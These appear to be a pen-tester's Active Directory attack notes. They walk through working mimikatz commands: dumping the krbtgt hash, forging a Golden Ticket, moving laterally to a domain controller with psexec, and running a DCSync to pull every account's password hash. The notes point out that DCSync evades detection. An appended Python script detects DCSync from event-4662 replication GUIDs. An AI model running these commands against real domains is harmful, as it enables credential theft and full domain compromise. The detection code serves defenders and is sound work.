# Assuming that the victim account is a member of Domain Admins, or that we have already compromised the DC.
# Let's extract the password hash of the krbtgt account with mimikatz.
mimikatz
privilege::debug
lsadump::lsa /patch
# Look for User:krbtgt and its NTLM hash.
kerberos::purge
kerberos::golden /user:<TOPI> /domain:<domain_name> /sid:S-1-5-21-1602875587-2787523311-2599479668 /krbtgt:<NTLM hash> /ptt
# This works because the DC trusts anything that is encrypted with the krbtgt password hash.
misc::cmd
psexec.exe \\dc01 cmd.exe
# Lateral movement to the DC.
whoami
whoami /groups
DCSync Attack
DCSync (Domain Controller Synchronization) -> steal the password hashes of all admin users in the domain.

Methods:
1) Laterally move to the DC and run mimikatz to dump the password hash of every user.
2) Steal ntds.dit from the DC.
3) The two methods above require uploading a tool and can get caught, so we use the third method: abuse the DC's own replication functionality.

# Log in with a local admin priv account and run mimikatz.
mimikatz
lsadump::dcsync /user:Administrator # Administrator is the target account.
We can request a replication update with a DC and obtain the pass hashes of every account in Active Directory without ever logging in to the domain controller.
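A defender-side check for the DCSync behaviour described above, added here as an example rather than code from the original notes: it scans Security-log 4662 records for the replication extended rights being exercised by a principal that is not a domain controller. The log lines and the DC allowlist are constructed for the example; the GUIDs are the well-known Active Directory extended-rights GUIDs.

```python
# Added example (not from the original notes): flag DCSync-style replication
# requests in Windows Security log data. A DCSync run appears on the DC as
# event 4662 whose Properties field carries the replication control-access
# GUIDs (the well-known AD extended-rights GUIDs below). Log lines and the
# DC allowlist are constructed for this example.
import re

REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Domain controller computer accounts replicate legitimately. Constructed
# allowlist; in practice build it from the Domain Controllers OU.
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}
# Constructed, flattened 4662 records: "EventID|SubjectUserName|Properties".
SAMPLE_EVENTS = [
    "4662|DC02$|%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "4662|jsmith|%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "4662|jsmith|%%7688 {bf967a86-0de6-11d0-a285-00aa003049e2}",
    "4624|jsmith|",
]
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)


def replication_guids(properties):
    """Names of replication extended rights present in a Properties field."""
    return [REPLICATION_GUIDS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_GUIDS]


def find_dcsync_candidates(events, known_dcs=KNOWN_DC_ACCOUNTS):
    """(account, rights) for each 4662 event in which a principal that is not
    a known DC exercised a replication right: a candidate DCSync."""
    hits = []
    for line in events:
        event_id, subject, properties = line.split("|", 2)
        if event_id != "4662" or subject in known_dcs:
            continue
        rights = replication_guids(properties)
        if rights:
            hits.append((subject, rights))
    return hits


if __name__ == "__main__":
    for account, rights in find_dcsync_candidates(SAMPLE_EVENTS):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

Only the user account that asked for the replication rights is reported; the legitimate DC-to-DC replication and the unrelated 4662 and 4624 records are ignored.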